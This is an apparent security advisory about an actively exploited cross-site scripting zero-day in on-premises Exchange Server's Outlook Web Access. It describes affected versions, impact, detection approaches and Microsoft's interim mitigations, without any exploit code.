Microsoft Confirms Actively Exploited Zero-Day in Exchange Server (CVE-2026-42897)

Executive Summary

Microsoft has confirmed a new high-severity zero-day vulnerability, CVE-2026-42897, is being actively exploited in the wild. The vulnerability is a cross-site scripting (XSS) flaw affecting on-premises versions of Microsoft Exchange Server (2016, 2019, and Subscription Edition) and carries a CVSS score of 8.1. An attacker can exploit this flaw by sending a specially crafted email, which, when opened in Outlook Web Access (OWA), can lead to arbitrary code execution in the user's browser context. Microsoft has not yet released a full security update but has provided automatic mitigations via its Exchange Emergency Mitigation (EM) Service and has made manual scripts available for air-gapped systems. Exchange Online is not affected.

Vulnerability Details

The vulnerability, CVE-2026-42897, is classified as an improper neutralization of input during web page generation, resulting in a Cross-Site Scripting (XSS) vulnerability. It specifically impacts Outlook Web Access (OWA), the web-based client for Exchange Server.

The attack vector requires an attacker to send a specially crafted email to a target user. For the exploit to trigger, the user must open this malicious email within OWA and perform certain interactions. If these conditions are met, the vulnerability allows the attacker to execute arbitrary JavaScript code within the security context of the victim's browser session. This can be used to perform actions on behalf of the user, steal session cookies, or conduct network-based spoofing attacks.

Exploitation Status

Microsoft has confirmed that CVE-2026-42897 is being actively exploited in the wild. However, details about the threat actors involved, the scale of the attacks, or the specific post-exploitation activities have not been disclosed. The vulnerability was reported to Microsoft by an anonymous researcher.

Affected Systems

The vulnerability affects the following on-premises Microsoft Exchange Server versions:

• Microsoft Exchange Server 2016 (Cumulative Update 23)
• Microsoft Exchange Server 2019 (Cumulative Update 12 and 13)
• Microsoft Exchange Server Subscription Edition

Important: Microsoft Exchange Online is not affected by this vulnerability.

Impact Assessment

While the CVSS score is 8.1 (High), the impact of a successful exploit can be significant. By executing code in the user's browser, an attacker can:

• Steal Sensitive Information: Access the user's emails, contacts, and calendar information within the OWA session.
• Perform Actions on Behalf of the User: Send emails, delete data, or forward sensitive information to an external party.
• Session Hijacking: Steal session cookies to gain unauthorized access to the user's OWA account without needing credentials.
• Pivot to Other Attacks: Use the compromised OWA session as a launchpad for further phishing or social engineering attacks against other employees within the organization.

The requirement for user interaction (opening a specific email in OWA) makes this less severe than a zero-click RCE flaw, but the active exploitation makes it a serious threat for organizations running on-premises Exchange.

Detection Methods

Security teams should focus on identifying vulnerable servers and monitoring for signs of exploitation. The following patterns may help identify vulnerable or compromised systems:

• Identify Vulnerable Servers: Use the Exchange Health Checker script (HealthChecker.ps1) to verify the version of your Exchange servers and confirm if they are vulnerable.
• Check Mitigation Status: The Health Checker script will also confirm if the automatic mitigation for CVE-2026-42897 has been successfully applied by the EM Service. The mitigation will appear in the output if it is active.
• Monitor Web Logs: Analyze OWA logs (typically located in C:\inetpub\logs\LogFiles\W3SVC1\) for unusual requests or suspicious patterns that might indicate XSS payloads. Look for long, encoded strings in URL parameters or POST bodies that are not typical for OWA traffic.
• Endpoint Detection: EDR solutions can be configured to monitor for suspicious child processes spawned by the w3wp.exe process associated with the OWA application pool.

Remediation Steps

Since a full security update is not yet available, organizations must rely on the mitigations provided by Microsoft.

1. Enable and Verify the Exchange Emergency Mitigation (EM) Service:

   • The EM Service is enabled by default on Exchange Server 2016 and later. It automatically checks for and applies critical mitigations from Microsoft hourly.
   • Verification: Run the Exchange Health Checker script (HealthChecker.ps1) to confirm the mitigation is applied. The script is the most reliable way to check the status.

2. Manual Mitigation for Disconnected Systems:

   • For servers without internet access or where the EM service cannot run, Microsoft has provided the Exchange On-premises Mitigation Tool (EOMT.ps1).
   • Download the script from Microsoft's official repository and run it on each Exchange server. This script will apply the same URL Rewrite rule that the EM service deploys.

Warning: These mitigations are temporary. Organizations must plan to install the full security update as soon as it is released by Microsoft, as mitigations can sometimes be bypassed by determined attackers.